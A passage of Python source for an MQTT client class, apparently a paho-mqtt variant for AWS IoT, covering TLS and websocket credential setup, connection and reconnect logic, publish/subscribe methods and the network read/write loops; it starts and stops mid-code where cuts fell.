def setBackoffTiming(self, srcBaseReconnectTimeSecond, srcMaximumReconnectTimeSecond, srcMinimumConnectTimeSecond):
"""
        Configure custom backoff timing for the reconnect logic.
srcBaseReconnectTimeSecond - The base reconnection time in seconds
srcMaximumReconnectTimeSecond - The maximum reconnection time in seconds
        srcMinimumConnectTimeSecond - The minimum time in seconds that a connection must be maintained in order to be considered stable
* Raise ValueError if input params are malformed
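        Example (illustrative sketch; the timing values are placeholders, not
        recommendations, and mqttc is an already-created client instance):
            mqttc.setBackoffTiming(1, 128, 20)  # base 1s, cap 128s, stable after 20s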
"""
self._backoffCore.configTime(srcBaseReconnectTimeSecond, srcMaximumReconnectTimeSecond, srcMinimumConnectTimeSecond)
def configIAMCredentials(self, srcAWSAccessKeyID, srcAWSSecretAccessKey, srcAWSSessionToken):
"""
        Configure custom IAM credentials for the websocket connection.
srcAWSAccessKeyID - AWS IAM access key
srcAWSSecretAccessKey - AWS IAM secret key
srcAWSSessionToken - AWS Session Token
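        Example (illustrative sketch; the credential values are placeholders
        and mqttc is an already-created client instance):
            mqttc.configIAMCredentials("<AccessKeyId>", "<SecretAccessKey>", "<SessionToken>")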
"""
self._AWSAccessKeyIDCustomConfig = srcAWSAccessKeyID
self._AWSSecretAccessKeyCustomConfig = srcAWSSecretAccessKey
self._AWSSessionTokenCustomConfig = srcAWSSessionToken
def reinitialise(self, client_id="", clean_session=True, userdata=None):
if self._ssl:
self._ssl.close()
self._ssl = None
self._sock = None
elif self._sock:
self._sock.close()
self._sock = None
if self._sockpairR:
self._sockpairR.close()
self._sockpairR = None
if self._sockpairW:
self._sockpairW.close()
self._sockpairW = None
self.__init__(client_id, clean_session, userdata)
def tls_set(self, ca_certs, certfile=None, keyfile=None, cert_reqs=cert_reqs, tls_version=tls_version, ciphers=None):
"""Configure network encryption and authentication options. Enables SSL/TLS support.
ca_certs : a string path to the Certificate Authority certificate files
that are to be treated as trusted by this client. If this is the only
option given then the client will operate in a similar manner to a web
browser. That is to say it will require the broker to have a
certificate signed by the Certificate Authorities in ca_certs and will
communicate using TLS v1, but will not attempt any form of
authentication. This provides basic network encryption but may not be
sufficient depending on how the broker is configured.
certfile and keyfile are strings pointing to the PEM encoded client
certificate and private keys respectively. If these arguments are not
None then they will be used as client information for TLS based
authentication. Support for this feature is broker dependent. Note
        that if either of these files is encrypted and needs a password to
decrypt it, Python will ask for the password at the command line. It is
not currently possible to define a callback to provide the password.
cert_reqs allows the certificate requirements that the client imposes
on the broker to be changed. By default this is ssl.CERT_REQUIRED,
which means that the broker must provide a certificate. See the ssl
pydoc for more information on this parameter.
tls_version allows the version of the SSL/TLS protocol used to be
specified. By default TLS v1 is used. Previous versions (all versions
beginning with SSL) are possible but not recommended due to possible
security problems.
ciphers is a string specifying which encryption ciphers are allowable
for this connection, or None to use the defaults. See the ssl pydoc for
more information.
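        Example (illustrative sketch; the certificate paths are placeholders
        and mqttc is an already-created client instance):
            mqttc.tls_set("/path/to/rootCA.pem",
                          certfile="/path/to/client.pem.crt",
                          keyfile="/path/to/client.pem.key")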
Must be called before connect() or connect_async()."""
if HAVE_SSL is False:
raise ValueError('This platform has no SSL/TLS.')
if sys.version < '2.7':
raise ValueError('Python 2.7 is the minimum supported version for TLS.')
if ca_certs is None:
raise ValueError('ca_certs must not be None.')
try:
f = open(ca_certs, "r")
except IOError as err:
raise IOError(ca_certs+": "+err.strerror)
else:
f.close()
if certfile is not None:
try:
f = open(certfile, "r")
except IOError as err:
raise IOError(certfile+": "+err.strerror)
else:
f.close()
if keyfile is not None:
try:
f = open(keyfile, "r")
except IOError as err:
raise IOError(keyfile+": "+err.strerror)
else:
f.close()
self._tls_ca_certs = ca_certs
self._tls_certfile = certfile
self._tls_keyfile = keyfile
self._tls_cert_reqs = cert_reqs
self._tls_version = tls_version
self._tls_ciphers = ciphers
def tls_insecure_set(self, value):
"""Configure verification of the server hostname in the server certificate.
If value is set to true, it is impossible to guarantee that the host
you are connecting to is not impersonating your server. This can be
useful in initial server testing, but makes it possible for a malicious
third party to impersonate your server through DNS spoofing, for
example.
Do not use this function in a real system. Setting value to true means
there is no point using encryption.
Must be called before connect()."""
if HAVE_SSL is False:
raise ValueError('This platform has no SSL/TLS.')
self._tls_insecure = value
def connect(self, host, port=1883, keepalive=60, bind_address=""):
"""Connect to a remote broker.
host is the hostname or IP address of the remote broker.
port is the network port of the server host to connect to. Defaults to
1883. Note that the default port for MQTT over SSL/TLS is 8883 so if you
are using tls_set() the port may need providing.
keepalive: Maximum period in seconds between communications with the
broker. If no other messages are being exchanged, this controls the
rate at which the client will send ping messages to the broker.
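        Example (illustrative sketch; the broker host is a placeholder and
        mqttc is an already-created client instance):
            mqttc.connect("broker.example.com", 1883, keepalive=60)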
"""
self.connect_async(host, port, keepalive, bind_address)
return self.reconnect()
def connect_srv(self, domain=None, keepalive=60, bind_address=""):
"""Connect to a remote broker.
domain is the DNS domain to search for SRV records; if None,
try to determine local domain name.
keepalive and bind_address are as for connect()
"""
if HAVE_DNS is False:
raise ValueError('No DNS resolver library found.')
if domain is None:
domain = socket.getfqdn()
domain = domain[domain.find('.') + 1:]
try:
rr = '_mqtt._tcp.%s' % domain
if self._ssl is not None:
# IANA specifies secure-mqtt (not mqtts) for port 8883
rr = '_secure-mqtt._tcp.%s' % domain
answers = []
for answer in dns.resolver.query(rr, dns.rdatatype.SRV):
addr = answer.target.to_text()[:-1]
answers.append((addr, answer.port, answer.priority, answer.weight))
except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer, dns.resolver.NoNameservers):
raise ValueError("No answer/NXDOMAIN for SRV in %s" % (domain))
# FIXME: doesn't account for weight
for answer in answers:
host, port, prio, weight = answer
try:
return self.connect(host, port, keepalive, bind_address)
except:
pass
raise ValueError("No SRV hosts responded")
def connect_async(self, host, port=1883, keepalive=60, bind_address=""):
"""Connect to a remote broker asynchronously. This is a non-blocking
        connect call that can be used with loop_start() to provide a very quick
start.
host is the hostname or IP address of the remote broker.
port is the network port of the server host to connect to. Defaults to
1883. Note that the default port for MQTT over SSL/TLS is 8883 so if you
are using tls_set() the port may need providing.
keepalive: Maximum period in seconds between communications with the
broker. If no other messages are being exchanged, this controls the
rate at which the client will send ping messages to the broker.
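        Example (illustrative sketch; the broker host is a placeholder and
        mqttc is an already-created client instance):
            mqttc.connect_async("broker.example.com", 1883, keepalive=60)
            mqttc.loop_start()  # the connection is made once the network loop runs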
"""
if host is None or len(host) == 0:
raise ValueError('Invalid host.')
if port <= 0:
raise ValueError('Invalid port number.')
if keepalive < 0:
raise ValueError('Keepalive must be >=0.')
if bind_address != "" and bind_address is not None:
if (sys.version_info[0] == 2 and sys.version_info[1] < 7) or (sys.version_info[0] == 3 and sys.version_info[1] < 2):
raise ValueError('bind_address requires Python 2.7 or 3.2.')
self._host = host
self._port = port
self._keepalive = keepalive
self._bind_address = bind_address
self._state_mutex.acquire()
self._state = mqtt_cs_connect_async
self._state_mutex.release()
def reconnect(self):
"""Reconnect the client after a disconnect. Can only be called after
connect()/connect_async()."""
if len(self._host) == 0:
raise ValueError('Invalid host.')
if self._port <= 0:
raise ValueError('Invalid port number.')
self._in_packet = {
"command": 0,
"have_remaining": 0,
"remaining_count": [],
"remaining_mult": 1,
"remaining_length": 0,
"packet": b"",
"to_process": 0,
"pos": 0}
self._out_packet_mutex.acquire()
self._out_packet = []
self._out_packet_mutex.release()
self._current_out_packet_mutex.acquire()
self._current_out_packet = None
self._current_out_packet_mutex.release()
self._msgtime_mutex.acquire()
self._last_msg_in = time.time()
self._last_msg_out = time.time()
self._msgtime_mutex.release()
self._ping_t = 0
self._state_mutex.acquire()
self._state = mqtt_cs_new
self._state_mutex.release()
if self._ssl:
self._ssl.close()
self._ssl = None
self._sock = None
elif self._sock:
self._sock.close()
self._sock = None
# Put messages in progress in a valid state.
self._messages_reconnect_reset()
try:
if (sys.version_info[0] == 2 and sys.version_info[1] < 7) or (sys.version_info[0] == 3 and sys.version_info[1] < 2):
sock = socket.create_connection((self._host, self._port))
else:
sock = socket.create_connection((self._host, self._port), source_address=(self._bind_address, 0))
except socket.error as err:
if err.errno != errno.EINPROGRESS and err.errno != errno.EWOULDBLOCK and err.errno != EAGAIN:
raise
if self._tls_ca_certs is not None:
if self._useSecuredWebsocket:
# Never assign to ._ssl before wss handshake is finished
# Non-None value for ._ssl will allow ops before wss-MQTT connection is established
rawSSL = ssl.wrap_socket(sock, ca_certs=self._tls_ca_certs, cert_reqs=ssl.CERT_REQUIRED) # Add server certificate verification
rawSSL.setblocking(0) # Non-blocking socket
                self._ssl = wssCore.securedWebsocketCore(rawSSL, self._host, self._port, self._AWSAccessKeyIDCustomConfig, self._AWSSecretAccessKeyCustomConfig, self._AWSSessionTokenCustomConfig)  # Override the _ssl socket
# self._ssl.enableDebug()
else:
self._ssl = ssl.wrap_socket(
sock,
certfile=self._tls_certfile,
keyfile=self._tls_keyfile,
ca_certs=self._tls_ca_certs,
cert_reqs=self._tls_cert_reqs,
ssl_version=self._tls_version,
ciphers=self._tls_ciphers)
if self._tls_insecure is False:
if sys.version_info[0] < 3 or (sys.version_info[0] == 3 and sys.version_info[1] < 2):
self._tls_match_hostname()
else:
ssl.match_hostname(self._ssl.getpeercert(), self._host)
self._sock = sock
self._sock.setblocking(0)
return self._send_connect(self._keepalive, self._clean_session)
def loop(self, timeout=1.0, max_packets=1):
"""Process network events.
This function must be called regularly to ensure communication with the
broker is carried out. It calls select() on the network socket to wait
for network events. If incoming data is present it will then be
processed. Outgoing commands, from e.g. publish(), are normally sent
        immediately when their function is called, but this is not always
possible. loop() will also attempt to send any remaining outgoing
messages, which also includes commands that are part of the flow for
messages with QoS>0.
timeout: The time in seconds to wait for incoming/outgoing network
traffic before timing out and returning.
max_packets: Not currently used.
Returns MQTT_ERR_SUCCESS on success.
Returns >0 on error.
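        Example (illustrative sketch of a manual network loop; mqttc is an
        already-created, connected client instance):
            while True:
                rc = mqttc.loop(timeout=1.0)
                if rc != MQTT_ERR_SUCCESS:
                    break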
A ValueError will be raised if timeout < 0"""
if timeout < 0.0:
raise ValueError('Invalid timeout.')
self._current_out_packet_mutex.acquire()
self._out_packet_mutex.acquire()
if self._current_out_packet is None and len(self._out_packet) > 0:
self._current_out_packet = self._out_packet.pop(0)
if self._current_out_packet:
wlist = [self.socket()]
else:
wlist = []
self._out_packet_mutex.release()
self._current_out_packet_mutex.release()
# sockpairR is used to break out of select() before the timeout, on a
# call to publish() etc.
rlist = [self.socket(), self._sockpairR]
try:
socklist = select.select(rlist, wlist, [], timeout)
except TypeError as e:
            # Socket isn't of the correct type; in all likelihood the connection is lost
return MQTT_ERR_CONN_LOST
except ValueError:
# Can occur if we just reconnected but rlist/wlist contain a -1 for
# some reason.
return MQTT_ERR_CONN_LOST
except:
return MQTT_ERR_UNKNOWN
if self.socket() in socklist[0]:
rc = self.loop_read(max_packets)
if rc or (self._ssl is None and self._sock is None):
return rc
if self._sockpairR in socklist[0]:
# Stimulate output write even though we didn't ask for it, because
# at that point the publish or other command wasn't present.
socklist[1].insert(0, self.socket())
# Clear sockpairR - only ever a single byte written.
try:
self._sockpairR.recv(1)
except socket.error as err:
if err.errno != EAGAIN:
raise
if self.socket() in socklist[1]:
rc = self.loop_write(max_packets)
if rc or (self._ssl is None and self._sock is None):
return rc
return self.loop_misc()
def publish(self, topic, payload=None, qos=0, retain=False):
"""Publish a message on a topic.
This causes a message to be sent to the broker and subsequently from
the broker to any clients subscribing to matching topics.
topic: The topic that the message should be published on.
payload: The actual message to send. If not given, or set to None a
zero length message will be used. Passing an int or float will result
in the payload being converted to a string representing that number. If
you wish to send a true int/float, use struct.pack() to create the
payload you require.
qos: The quality of service level to use.
retain: If set to true, the message will be set as the "last known
good"/retained message for the topic.
Returns a tuple (result, mid), where result is MQTT_ERR_SUCCESS to
indicate success or MQTT_ERR_NO_CONN if the client is not currently
connected. mid is the message ID for the publish request. The mid
value can be used to track the publish request by checking against the
mid argument in the on_publish() callback if it is defined.
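        Example (illustrative sketch; the topic and payload are placeholders
        and mqttc is an already-created, connected client instance):
            (rc, mid) = mqttc.publish("sensors/temperature", "21.5", qos=1)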
A ValueError will be raised if topic is None, has zero length or is
invalid (contains a wildcard), if qos is not one of 0, 1 or 2, or if
the length of the payload is greater than 268435455 bytes."""
if topic is None or len(topic) == 0:
raise ValueError('Invalid topic.')
if qos<0 or qos>2:
raise ValueError('Invalid QoS level.')
if isinstance(payload, str) or isinstance(payload, bytearray):
local_payload = payload
elif sys.version_info[0] < 3 and isinstance(payload, unicode):
local_payload = payload
elif isinstance(payload, int) or isinstance(payload, float):
local_payload = str(payload)
elif payload is None:
local_payload = None
else:
raise TypeError('payload must be a string, bytearray, int, float or None.')
if local_payload is not None and len(local_payload) > 268435455:
raise ValueError('Payload too large.')
if self._topic_wildcard_len_check(topic) != MQTT_ERR_SUCCESS:
raise ValueError('Publish topic cannot contain wildcards.')
local_mid = self._mid_generate()
if qos == 0:
rc = self._send_publish(local_mid, topic, local_payload, qos, retain, False)
return (rc, local_mid)
else:
message = MQTTMessage()
message.timestamp = time.time()
message.mid = local_mid
message.topic = topic
if local_payload is None or len(local_payload) == 0:
message.payload = None
else:
message.payload = local_payload
message.qos = qos
message.retain = retain
message.dup = False
self._out_message_mutex.acquire()
self._out_messages.append(message)
if self._max_inflight_messages == 0 or self._inflight_messages < self._max_inflight_messages:
self._inflight_messages = self._inflight_messages+1
if qos == 1:
message.state = mqtt_ms_wait_for_puback
elif qos == 2:
message.state = mqtt_ms_wait_for_pubrec
self._out_message_mutex.release()
rc = self._send_publish(message.mid, message.topic, message.payload, message.qos, message.retain, message.dup)
            # remove from inflight messages so it will be sent after a connection is made
if rc is MQTT_ERR_NO_CONN:
with self._out_message_mutex:
self._inflight_messages -= 1
message.state = mqtt_ms_publish
return (rc, local_mid)
else:
                message.state = mqtt_ms_queued
self._out_message_mutex.release()
return (MQTT_ERR_SUCCESS, local_mid)
def username_pw_set(self, username, password=None):
"""Set a username and optionally a password for broker authentication.
Must be called before connect() to have any effect.
Requires a broker that supports MQTT v3.1.
username: The username to authenticate with. Need have no relationship to the client id.
password: The password to authenticate with. Optional, set to None if not required.
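        Example (illustrative sketch; the credentials are placeholders and
        mqttc is an already-created client instance; call before connect()):
            mqttc.username_pw_set("example-user", password="example-pass")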
"""
self._username = username.encode('utf-8')
self._password = password
def disconnect(self):
"""Disconnect a connected client from the broker."""
self._state_mutex.acquire()
self._state = mqtt_cs_disconnecting
self._state_mutex.release()
self._backoffCore.stopStableConnectionTimer()
if self._sock is None and self._ssl is None:
return MQTT_ERR_NO_CONN
return self._send_disconnect()
def subscribe(self, topic, qos=0):
"""Subscribe the client to one or more topics.
This function may be called in three different ways:
Simple string and integer
-------------------------
e.g. subscribe("my/topic", 2)
topic: A string specifying the subscription topic to subscribe to.
qos: The desired quality of service level for the subscription.
Defaults to 0.
String and integer tuple
------------------------
e.g. subscribe(("my/topic", 1))
topic: A tuple of (topic, qos). Both topic and qos must be present in
the tuple.
qos: Not used.
List of string and integer tuples
        ---------------------------------
e.g. subscribe([("my/topic", 0), ("another/topic", 2)])
        This allows multiple topic subscriptions in a single SUBSCRIBE
command, which is more efficient than using multiple calls to
subscribe().
        topic: A list of tuples of the format (topic, qos). Both topic and qos must
be present in all of the tuples.
qos: Not used.
The function returns a tuple (result, mid), where result is
MQTT_ERR_SUCCESS to indicate success or (MQTT_ERR_NO_CONN, None) if the
client is not currently connected. mid is the message ID for the
subscribe request. The mid value can be used to track the subscribe
request by checking against the mid argument in the on_subscribe()
callback if it is defined.
Raises a ValueError if qos is not 0, 1 or 2, or if topic is None or has
zero string length, or if topic is not a string, tuple or list.
"""
topic_qos_list = None
if isinstance(topic, str):
if qos<0 or qos>2:
raise ValueError('Invalid QoS level.')
if topic is None or len(topic) == 0:
raise ValueError('Invalid topic.')
topic_qos_list = [(topic.encode('utf-8'), qos)]
elif isinstance(topic, tuple):
if topic[1]<0 or topic[1]>2:
raise ValueError('Invalid QoS level.')
if topic[0] is None or len(topic[0]) == 0 or not isinstance(topic[0], str):
raise ValueError('Invalid topic.')
topic_qos_list = [(topic[0].encode('utf-8'), topic[1])]
elif isinstance(topic, list):
topic_qos_list = []
for t in topic:
if t[1]<0 or t[1]>2:
raise ValueError('Invalid QoS level.')
if t[0] is None or len(t[0]) == 0 or not isinstance(t[0], str):
raise ValueError('Invalid topic.')
topic_qos_list.append((t[0].encode('utf-8'), t[1]))
if topic_qos_list is None:
raise ValueError("No topic specified, or incorrect topic type.")
if self._sock is None and self._ssl is None:
return (MQTT_ERR_NO_CONN, None)
return self._send_subscribe(False, topic_qos_list)
def unsubscribe(self, topic):
"""Unsubscribe the client from one or more topics.
topic: A single string, or list of strings that are the subscription
topics to unsubscribe from.
Returns a tuple (result, mid), where result is MQTT_ERR_SUCCESS
to indicate success or (MQTT_ERR_NO_CONN, None) if the client is not
currently connected.
mid is the message ID for the unsubscribe request. The mid value can be
used to track the unsubscribe request by checking against the mid
argument in the on_unsubscribe() callback if it is defined.
Raises a ValueError if topic is None or has zero string length, or is
not a string or list.
"""
topic_list = None
if topic is None:
raise ValueError('Invalid topic.')
if isinstance(topic, str):
if len(topic) == 0:
raise ValueError('Invalid topic.')
topic_list = [topic.encode('utf-8')]
elif isinstance(topic, list):
topic_list = []
for t in topic:
if len(t) == 0 or not isinstance(t, str):
raise ValueError('Invalid topic.')
topic_list.append(t.encode('utf-8'))
if topic_list is None:
raise ValueError("No topic specified, or incorrect topic type.")
if self._sock is None and self._ssl is None:
return (MQTT_ERR_NO_CONN, None)
return self._send_unsubscribe(False, topic_list)
def loop_read(self, max_packets=1):
"""Process read network events. Use in place of calling loop() if you
wish to handle your client reads as part of your own application.
Use socket() to obtain the client socket to call select() or equivalent
on.
Do not use if you are using the threaded interface loop_start()."""
if self._sock is None and self._ssl is None:
return MQTT_ERR_NO_CONN
max_packets = len(self._out_messages) + len(self._in_messages)
if max_packets < 1:
max_packets = 1
for i in range(0, max_packets):
rc = self._packet_read()
if rc > 0:
return self._loop_rc_handle(rc)
elif rc == MQTT_ERR_AGAIN:
return MQTT_ERR_SUCCESS
return MQTT_ERR_SUCCESS
def loop_write(self, max_packets=1):
"""Process read network events. Use in place of calling loop() if you
wish to handle your client reads as part of your own application.
Use socket() to obtain the client socket to call select() or equivalent
on.
Use want_write() to determine if there is data waiting to be written.
Do not use if you are using the threaded interface loop_start()."""
if self._sock is None and self._ssl is None:
return MQTT_ERR_NO_CONN
max_packets = len(self._out_packet) + 1
if max_packets < 1:
max_packets = 1
for i in range(0, max_packets):
rc = self._packet_write()
if rc > 0:
return self._loop_rc_handle(rc)
elif rc == MQTT_ERR_AGAIN:
return MQTT_ERR_SUCCESS
return MQTT_ERR_SUCCESS
def want_write(self):
"""Call to determine if there is network data waiting to be written.
Useful if you are calling select() yourself rather than using loop().
"""
if self._current_out_packet or len(self._out_packet) > 0:
return True
else:
return False
def loop_misc(self):
"""Process miscellaneous network events. Use in place of calling loop() if you
        wish to call select() or equivalent on the client socket yourself.
Do not use if you are using the threaded interface loop_start()."""
if self._sock is None and self._ssl is None:
return MQTT_ERR_NO_CONN
now = time.time()
self._check_keepalive()
if self._last_retry_check+1 < now:
# Only check once a second at most
self._message_retry_check()
self._last_retry_check = now
if self._ping_t > 0 and now - self._ping_t >= self._keepalive:
# client->ping_t != 0 means we are waiting for a pingresp.
# This hasn't happened in the keepalive time so we should disconnect.
if self._ssl:
self._ssl.close()
self._ssl = None
elif self._sock:
self._sock.close()
self._sock = None
self._callback_mutex.acquire()
if self._state == mqtt_cs_disconnecting:
rc = MQTT_ERR_SUCCESS
else:
rc = 1
if self.on_disconnect:
self._in_callback = True
self.on_disconnect(self, self._userdata, rc)
self._in_callback = False
self._callback_mutex.release()
return MQTT_ERR_CONN_LOST
return MQTT_ERR_SUCCESS
def max_inflight_messages_set(self, inflight):
"""Set the maximum number of messages with QoS>0 that can be part way
through their network flow at once. Defaults to 20."""
if inflight < 0:
raise ValueError('Invalid inflight.')
self._max_inflight_messages = inflight
def message_retry_set(self, retry):
"""Set the timeout in seconds before a message with QoS>0 is retried.
20 seconds by default."""
if retry < 0:
raise ValueError('Invalid retry.')
self._message_retry = retry
def user_data_set(self, userdata):
"""Set the user data variable passed to callbacks. May be any data type."""
self._userdata = userdata
def will_set(self, topic, payload=None, qos=0, retain=False):
"""Set a Will to be sent by the broker in case the client disconnects unexpectedly.
This must be called before connect() to have any effect.
topic: The topic that the will message should be published on.
payload: The message to send as a will. If not given, or set to None a
zero length message will be used as the will. Passing an int or float
will result in the payload being converted to a string representing
that number. If you wish to send a true int/float, use struct.pack() to
create the payload you require.
qos: The quality of service level to use for the will.
retain: If set to true, the will message will be set as the "last known
good"/retained message for the topic.
Raises a ValueError if qos is not 0, 1 or 2, or if topic is None or has
zero string length.
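        Example (illustrative sketch; the topic and payload are placeholders
        and mqttc is an already-created client instance; call before connect()):
            mqttc.will_set("clients/example-client/status", "offline", qos=1, retain=True)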
"""
if topic is None or len(topic) == 0:
raise ValueError('Invalid topic.')
if qos<0 or qos>2:
raise ValueError('Invalid QoS level.')
if isinstance(payload, str):
self._will_payload = payload.encode('utf-8')
elif isinstance(payload, bytearray):
self._will_payload = payload
elif isinstance(payload, int) or isinstance(payload, float):
self._will_payload = str(payload)
elif payload is None:
self._will_payload = None
else:
raise TypeError('payload must be a string, bytearray, int, float or None.')
self._will = True
self._will_topic = topic.encode('utf-8')
self._will_qos = qos
self._will_retain = retain
def will_clear(self):
""" Removes a will that was previously configured with will_set().
Must be called before connect() to have any effect."""
self._will = False
self._will_topic = ""
self._will_payload = None
self._will_qos = 0
self._will_retain = False
def socket(self):
"""Return the socket or ssl object for this client."""
if self._ssl:
if self._useSecuredWebsocket:
return self._ssl.getSSLSocket()
else:
return self._ssl
else:
return self._sock
def loop_forever(self, timeout=1.0, max_packets=1, retry_first_connection=False):
"""This function call loop() for you in an infinite blocking loop. It
is useful for the case where you only want to run the MQTT client loop
in your program.
loop_forever() will handle reconnecting for you. If you call
disconnect() in a callback it will return.
timeout: The time in seconds to wait for incoming/outgoing network
traffic before timing out and returning.
max_packets: Not currently used.
retry_first_connection: Should the first connection attempt be retried on failure.
Raises socket.error on first connection failures unless retry_first_connection=True
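        Example (illustrative sketch; the broker host is a placeholder and
        mqttc is an already-created client instance):
            mqttc.connect("broker.example.com", 1883, keepalive=60)
            mqttc.loop_forever()  # blocks here, reconnecting as needed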
"""
run = True
while run:
if self._state == mqtt_cs_connect_async:
try:
self.reconnect()
except socket.error:
if not retry_first_connection:
raise
self._easy_log(MQTT_LOG_DEBUG, "Connection failed, retrying")
self._backoffCore.backOff()
# time.sleep(1)
else:
break
while run:
rc = MQTT_ERR_SUCCESS
while rc == MQTT_ERR_SUCCESS:
rc = self.loop(timeout, max_packets)
# We don't need to worry about locking here, because we've
# either called loop_forever() when in single threaded mode, or
# in multi threaded mode when loop_stop() has been called and
# so no other threads can access _current_out_packet,
# _out_packet or _messages.
if (self._thread_terminate is True
and self._current_out_packet is None
and len(self._out_packet) == 0
and len(self._out_messages) == 0):
rc = 1
run = False
self._state_mutex.acquire()
if self._state == mqtt_cs_disconnecting or run is False or self._thread_terminate is True:
run = False
self._state_mutex.release()
else:
self._state_mutex.release()
self._backoffCore.backOff()
# time.sleep(1)
self._state_mutex.acquire()
if self._state == mqtt_cs_disconnecting or run is False or self._thread_terminate is True:
run = False
self._state_mutex.release()
else:
self._state_mutex.release()
try:
self.reconnect()
except socket.error as err:
pass
return rc
def loop_start(self):
"""This is part of the threaded client interface. Call this once to
start a new thread to process network traffic. This provides an
alternative to repeatedly calling loop() yourself.
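        Example (illustrative sketch; mqttc is an already-created client
        instance with connect()/connect_async() already called):
            mqttc.loop_start()   # spawns the background network thread
            # ... publish/subscribe from the main thread here ...
            mqttc.loop_stop()    # blocks until the network thread exits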
"""
if self._thread is not None:
return MQTT_ERR_INVAL
self._thread_terminate = False
self._thread = threading.Thread(target=self._thread_main)
self._thread.daemon = True
self._thread.start()
def loop_stop(self, force=False):
"""This is part of the threaded client interface. Call this once to
stop the network thread previously created with loop_start(). This call
will block until the network thread finishes.
The force parameter is currently ignored.
"""
if self._thread is None:
return MQTT_ERR_INVAL
self._thread_terminate = True
self._thread.join()
self._thread = None
def message_callback_add(self, sub, callback):
"""Register a message callback for a specific topic.
Messages that match 'sub' will be passed to 'callback'. Any
non-matching messages will be passed to the default on_message
callback.
Call multiple times with different 'sub' to define multiple topic
specific callbacks.
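        Example (illustrative sketch; the topic filter is a placeholder and
        mqttc is an already-created client instance):
            def on_sensor_message(client, userdata, message):
                print(message.topic, message.payload)
            mqttc.message_callback_add("sensors/#", on_sensor_message)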
Topic specific callbacks may be removed with
message_callback_remove()."""
if callback is None or sub is None:
raise ValueError("sub and callback must both be defined.")
self._callback_mutex.acquire()
for i in range(0, len(self.on_message_filtered)):
if self.on_message_filtered[i][0] == sub:
self.on_message_filtered[i] = (sub, callback)
self._callback_mutex.release()
return
self.on_message_filtered.append((sub, callback))
self._callback_mutex.release()
def message_callback_remove(self, sub):
"""Remove a message callback previously registered with
message_callback_add()."""
if sub is None:
raise ValueError("sub must defined.")
self._callback_mutex.acquire()
for i in range(0, len(self.on_message_filtered)):
if self.on_message_filtered[i][0] == sub:
self.on_message_filtered.pop(i)
self._callback_mutex.release()
return
self._callback_mutex.release()
# ============================================================
# Private functions
# ============================================================
def _loop_rc_handle(self, rc):
if rc:
if self._ssl:
self._ssl.close()
self._ssl = None
elif self._sock:
self._sock.close()
self._sock = None
self._state_mutex.acquire()
if self._state == mqtt_cs_disconnecting:
rc = MQTT_ERR_SUCCESS
self._state_mutex.release()
self._callback_mutex.acquire()
if self.on_disconnect:
self._in_callback = True
self.on_disconnect(self, self._userdata, rc)
self._in_callback = False
self._callback_mutex.release()
return rc
def _packet_read(self):
# This gets called if pselect() indicates that there is network data
# available - ie. at least one byte. What we do depends on what data we
# already have.
# If we've not got a command, attempt to read one and save it. This should
# always work because it's only a single byte.
        # Then try to read the remaining length. This may fail because it may
# be more than one byte - will need to save data pending next read if it
# does fail.
# Then try to read the remaining payload, where 'payload' here means the
# combined variable header and actual payload. This is the most likely to
# fail due to longer length, so save current data and current position.
# After all data is read, send to _mqtt_handle_packet() to deal with.
# Finally, free the memory and reset everything to starting conditions.
if self._in_packet['command'] == 0:
try:
if self._ssl:
command = self._ssl.read(1)
else:
command = self._sock.recv(1)
except socket.error as err:
if self._ssl and (err.errno == ssl.SSL_ERROR_WANT_READ or err.errno == ssl.SSL_ERROR_WANT_WRITE):
return MQTT_ERR_AGAIN
if err.errno == EAGAIN:
return MQTT_ERR_AGAIN
print(err)
return 1
else:
if len(command) == 0:
return 1
command = struct.unpack("!B", command)
self._in_packet['command'] = command[0]
if self._in_packet['have_remaining'] == 0:
# Read remaining
# Algorithm for decoding taken from pseudo code at
# http://publib.boulder.ibm.com/infocenter/wmbhelp/v6r0m0/topic/com.ibm.etools.mft.doc/ac10870_.htm
while True:
try:
if self._ssl:
byte = self._ssl.read(1)
else:
byte = self._sock.recv(1)
except socket.error as err:
if self._ssl and (err.errno == ssl.SSL_ERROR_WANT_READ or err.errno == ssl.SSL_ERROR_WANT_WRITE):
return MQTT_ERR_AGAIN
if err.errno == EAGAIN:
return MQTT_ERR_AGAIN
print(err)
return 1
else:
byte = struct.unpack("!B", byte)
byte = byte[0]
self._in_packet['remaining_count'].append(byte)
# Max 4 bytes length for remaining length as defined by protocol.
# Anything more likely means a broken/malicious client.
if len(self._in_packet['remaining_count']) > 4:
return MQTT_ERR_PROTOCOL
self._in_packet['remaining_length'] = self._in_packet['remaining_length'] + (byte & 127)*self._in_packet['remaining_mult']
self._in_packet['remaining_mult'] = self._in_packet['remaining_mult'] * 128
if (byte & 128) == 0:
break
self._in_packet['have_remaining'] = 1
self._in_packet['to_process'] = self._in_packet['remaining_length']
while self._in_packet['to_process'] > 0:
try:
if self._ssl:
data = self._ssl.read(self._in_packet['to_process'])
else:
data = self._sock.recv(self._in_packet['to_process'])
except socket.error as err:
if self._ssl and (err.errno == ssl.SSL_ERROR_WANT_READ or err.errno == ssl.SSL_ERROR_WANT_WRITE):
return MQTT_ERR_AGAIN
if err.errno == EAGAIN:
return MQTT_ERR_AGAIN
print(err)
return 1
else:
self._in_packet['to_process'] = self._in_packet['to_process'] - len(data)
self._in_packet['packet'] = self._in_packet['packet'] + data
# All data for this packet is read.
self._in_packet['pos'] = 0
rc = self._packet_handle()
# Free data and reset values
self._in_packet = dict(
command=0,
have_remaining=0,
remaining_count=[],
remaining_mult=1,
remaining_length=0,
packet=b"",
to_process=0,
pos=0)
self._msgtime_mutex.acquire()
self._last_msg_in = time.time()
self._msgtime_mutex.release()
return rc
def _packet_write(self):
self._current_out_packet_mutex.acquire()
while self._current_out_packet:
packet = self._current_out_packet
try:
if self._ssl:
write_length = self._ssl.write(packet['packet'][packet['pos']:])
else:
write_length = self._sock.send(packet['packet'][packet['pos']:])
except AttributeError:
self._current_out_packet_mutex.release()
return MQTT_ERR_SUCCESS
except socket.error as err:
self._current_out_packet_mutex.release()
if self._ssl and (err.errno == ssl.SSL_ERROR_WANT_READ or err.errno == ssl.SSL_ERROR_WANT_WRITE):
return MQTT_ERR_AGAIN
if err.errno == EAGAIN:
return MQTT_ERR_AGAIN
print(err)
return 1
if write_length > 0:
packet['to_process'] = packet['to_process'] - write_length
packet['pos'] = packet['pos'] + write_length
if packet['to_process'] == 0:
if (packet['command'] & 0xF0) == PUBLISH and packet['qos'] == 0:
self._callback_mutex.acquire()
if self.on_publish:
self._in_callback = True
self.on_publish(self, self._userdata, packet['mid'])
self._in_callback = False
self._callback_mutex.release()
if (packet['command'] & 0xF0) == DISCONNECT:
